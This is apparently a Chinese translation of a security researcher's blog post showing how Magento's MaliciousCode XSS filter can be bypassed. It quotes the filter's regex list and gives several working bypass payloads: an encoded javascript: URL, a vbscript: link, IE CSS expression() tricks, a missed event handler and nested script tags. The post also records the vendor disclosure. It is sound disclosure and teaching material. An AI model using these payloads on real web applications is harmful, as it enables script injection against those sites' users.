绕过XSS filters的几种方法

   <p><strong><img src="https://simg.open-open.com/show/2f93cd623465125800da37ba0891e6b1.jpg"> </strong></p>    <p>XSS跨站脚本攻击是指，黑客向一个页面中注入Javascript脚本，其它的用户访问该页面时会执行这个脚本。为了防止这一攻击，一些软件尝试从输入中移除Javascript代码。这很难正确实现。在这篇文章中我会展示一些试图移除输入里的Javascript脚本的代码，并演示几中绕过它的方法。</p>    <p>以网上商城软件 <a href="/misc/goto?guid=4959673441664616735" rel="nofollow,noindex">Magento</a> 中的类 <a href="/misc/goto?guid=4959673441743246391" rel="nofollow,noindex">Mage_Core_Model_Input_Filter_MaliciousCode</a> 为例。这个类的作用是过滤“恶意代码”，包括以任何形式插入的Javascript。</p>    <p>代码如下所示：</p>    <pre>  <code class="language-javascript">protected $_expressions = array(      '/(\/\*.*\*\/)/Us',      '/(\t)/',      '/(javascript\s*:)/Usi',      '/(@import)/Usi',      '/style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis',      '/(ondblclick|onclick|onkeydown|onkeypress|onkeyup|onmousedown|onmousemove|onmouseout|onmouseover|onmouseup|onload|onunload|onerror)=[^<]*(?=\>)/Uis',      '/<\/?(script|meta|link|frame|iframe).*>/Uis',      '/src=[^<]*base64[^<]*(?=\>)/Uis',  );  function filter($value) {      return preg_replace($this->_expressions, '', $value);  }</code></pre>    <p>$_expressions变量包含一个正则表达式列表，preg_replace函数会移除文本中匹配该正则表达式的内容。所以如果你输入<script>foo</script>，两个标签都会被移除，只保留foo。</p>    <p>让我们看一些绕过这个filter的方法。我们的目标是绕过它传递一些执行Javascript的HTML代码。这个filter有若干表达式，它们的含义是阻止下面的内容：</p>    <p style="text-align:center"><img src="https://simg.open-open.com/show/76c19e0075c9d2657f9c4f7387482c06.jpg"></p>    <h2>Javascript URL</h2>    <p>可以在URL中使用javascript:…让该链接执行javascript：</p>    <pre>  <code class="language-javascript"><a href="javascript:alert('test')">link</a></code></pre>    <p>filter移除了代码中的javascript:，所以我们不能直接用上面的代码。我们可以试着改变javascript:部分，让浏览器任然执行它并且正则表达式匹配不上。我们试试URL-encode：</p>    <pre>  <code class="language-javascript"><a href="javascript:alert('xss')">link</a></code></pre>    <p>正则表达式匹配不上了，但浏览器在用它之前对该链接做了URL-decode操作，所以依然可以执行它。</p>    <p>除了Javascript之外还有VBScript。它在IE11中被弃用并且禁用了，但是在Internet Explorer的老版本中依然可以使用，如果你把IE 11设置为IE 10模拟模式的话也是可用的。我们可以像Javascript链接那样执行相同的代码。</p>    <pre>  <code class="language-javascript"><a href='vbscript:MsgBox("XSS")'>link</a></code></pre>    <h2>CSS导入</h2>    <p>Internet Explorer在CSS中支持Javascript表达式，称为动态属性 <a href="/misc/goto?guid=4959673441832656551" rel="nofollow,noindex">https://msdn.microsoft.com/en-us/library/ms537634</a> (v=vs.85).aspx。允许攻击者加载外部的CSS样式表是非常危险的，因为攻击者可以在原始页面的上下文中执行Javascript。</p>    <p>在恶意的css中：</p>    <pre>  <code class="language-javascript">body {      color: expression(alert('XSS'));  }</code></pre>    <p>我们可以在CSS中使用反斜杠转义字符来规避@import过滤。</p>    <p>Internet Explorer允许反斜杠，现在它绕过了我们的filter。</p>    <h2>Inline样式</h2>    <p>我们也可以使用Inernet Explorer支持的内嵌样式中的动态属性：</p>    <pre>  <code class="language-javascript"><div style="color: expression(alert('XSS'))"></code></pre>    <p>filter会检查这样的字符串，style后面跟的不是<并且后面包含expression:</p>    <pre>  <code class="language-javascript">/style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis</code></pre>    <p>因此，我们在那里增加一个<.</p>    <pre>  <code class="language-javascript"><div style="color: '<'; color: expression(alert('XSS'))"></code></pre>    <p>这可以绕过filter，因为[^<]匹配不上<，并且这还是一个有效的CSS，虽然“<”不是一个有效的color，但是其余部分仍然被使用了。</p>    <h2>Javascript事件</h2>    <p>可以在一个元素上定义事件句柄，如下：</p>    <pre>  <code class="language-javascript"><div onclick="alert('xss')"></code></pre>    <p>这样，这个Javascript会在有人点击它的时候执行，但是也有一些事件是在页面加载后或者用户移动鼠标的时候触发。filter移除了许多这样的事件，但是它并没有包含所有的事件句柄。比如，漏了onmouseenter：</p>    <pre>  <code class="language-javascript"><div onmouseenter="alert('xss')"></code></pre>    <p>我们的代码会在用户把鼠标移动到div上面时执行。</p>    <p>另一个绕过的方法是在属性和”=”之间加上一个空格。Magento在最新版本的恶意代码filter中已经修复了它。</p>    <pre>  <code class="language-javascript"><div onclick ="alert('xss')"></code></pre>    <h2>Script标签</h2>    <p>Script标签可以用来定义行内脚本，或者从其它位置加载脚本文件：</p>    <p>我们的filter移除了<script>标签。然而，它只是做一次，因此我们可以让我们想要的内容在移除标签之后出现：</p>    <pre>  <code class="language-javascript"><scr<script>ipt>alert("XSS")</scr<script>ipt></code></pre>    <p>filter移除了两个发现的<script>，最后我们还是执行了想要的代码。实际上，这个嵌套标签的办法可以用来规避任意的filter表达式。</p>    <h2>结论</h2>    <p>尽管filter试图阻止了几种脚本注入的办法，我们都找到了规避的方法。创建一个filter来规避XSS攻击是不容易的。你必须考虑各种编码类型以及不同的浏览器行为。这让开发者做起来很难，却方便了攻击者。</p>    <h2>安全影响</h2>    <p>我展示了几种绕过filter的办法。这是一个安全威胁，除非没有对不可信输入使用这个filter。在 <a href="/misc/goto?guid=4959673441924072224" rel="nofollow,noindex">Magento 2.0.1 release notes</a> 中有这样一段话：</p>    <p>用户在输入HTML代码的时候可以轻易绕过MaliciousCode filter函数。但是，Magento几乎不用这个filter，并且当前的用法都不允许未授权用户输入。</p>    <p>1月23日，我进一步联系了Magento，他们不认为这是一个安全问题，所以我发布了这篇文章。</p>    <p>*本文译者：felix，翻译自： <a href="/misc/goto?guid=4959673441999785961" rel="nofollow,noindex">http://www.sjoerdlangkemper.nl/2016/01/29/circumventing-xss-filters/</a> </p>    <p> </p>    <p>来自： <a href="/misc/goto?guid=4959673442086243912" rel="nofollow">http://www.freebuf.com/articles/web/104656.html</a></p>    <p> </p>